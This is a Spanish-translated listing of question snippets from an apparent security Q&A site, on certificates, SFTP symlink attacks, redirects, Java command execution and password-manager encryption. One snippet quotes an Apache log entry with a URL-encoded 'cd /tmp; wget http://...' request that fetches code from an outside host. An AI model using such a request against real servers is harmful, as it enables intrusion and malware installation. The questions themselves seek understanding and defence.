Todas las preguntas

1
respuesta

La cadena de confianza del certificado SSL muestra el certificado raíz con una clave pública de 1024 bits. ¿Es esta evidencia de un ataque MITM?

Mi cuenta en el registrador de mi nombre de dominio fue pirateada y estoy tratando de entender cómo los hackers pudieron robar mis credenciales de inicio de sesión. Debido a que el certificado raíz en la cadena de confianza para el certificado s...
pregunta 01.08.2015 - 22:40
2
respuestas

ejecución del comando Java sin Runtime.exec

Estoy tratando de encontrar todas las formas en que uno podría ejecutar comandos en java. El objetivo es hacer una lista de palabras clave para listas negras en herramientas y filtros de análisis de código estático. Hasta ahora solo he encont...
pregunta 02.03.2017 - 15:54
1
respuesta

¿Debo evitar la implementación de archivos package.json o bower.json en producción?

Sé que se recomienda ocultar la información de versión del SO y del servidor cuando se sirven páginas web. ¿Qué pasa con la información de la versión de la biblioteca js contenida en los archivos package.json o bower.json? Parece que esto podría...
pregunta 09.03.2017 - 18:08
1
respuesta

¿Cómo asegurar SFTP contra un ataque de enlace simbólico?

He configurado SFTP en mi máquina virtual, porque quería probar cómo puedo usar symlink para acceder a archivos fuera del directorio principal del usuario. He creado usuario: test:x:1003:1001::/var/www/test/public:/bin/false...
pregunta 16.03.2017 - 10:42
3
respuestas

¿Por qué las CA no utilizan mecanismos de identificación electrónica gubernamentales?

Es posible que haya oído hablar de las eIDAS europeas y los enfoques de cada país para la autenticación electrónica electrónica de los ciudadanos (por ejemplo, Belgium , Estonia , Alemania , Austria ). Ahora solo hay una única CA (pági...
pregunta 10.03.2017 - 14:24
1
respuesta

Pregunta de seguridad de derivación de clave LastPass

He investigado acerca de los administradores de contraseñas y, por supuesto, me he topado con LastPass. Hay muchas preguntas y respuestas sobre la seguridad de LastPass, pero hasta donde sé, ninguno de ellos habló directamente sobre esta impleme...
pregunta 21.10.2015 - 19:04
3
respuestas

¿Cómo se pueden explotar los "redireccionamientos y reenvíos no validados"?

El ejemplo de OWASP para Redirecciones y reenvíos no validados dice que:    La aplicación tiene una página llamada "redirect.jsp" que toma un solo parámetro llamado "url". El atacante crea una URL maliciosa que redirige a los usuarios a un...
pregunta 12.03.2017 - 22:49
2
respuestas

Bypass de autenticación horizontal frente a vertical

Me pregunto si alguien podría confirmar mi pensamiento sobre lo siguiente. A pesar de googlear, no he encontrado una respuesta directa, aunque he visto la terminología horizontal frente a la vertical en otros contextos de segundo ... Nota que...
pregunta 20.03.2017 - 03:27
1
respuesta

¿Cómo podría funcionar este ataque?

Estaba explorando mis registros de apache y encontré la siguiente solicitud (que resultó en un 404): 106.75.130.216 - - [DD/MMM/YYYY:hh:mm:ss] "GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%36%31%2E%31%36%30%2E%32...
pregunta 26.03.2017 - 18:29
3
respuestas

¿El cifrado de Acronis True Image es seguro?

Utilizo el software de copia de seguridad Acronis para crear imágenes de mi sistema, tengo una copia de cosas importantes en la nube y todas las demás cosas relacionadas con las copias de seguridad. Como indica Acronis, su software utiliza el...
pregunta 11.03.2017 - 13:57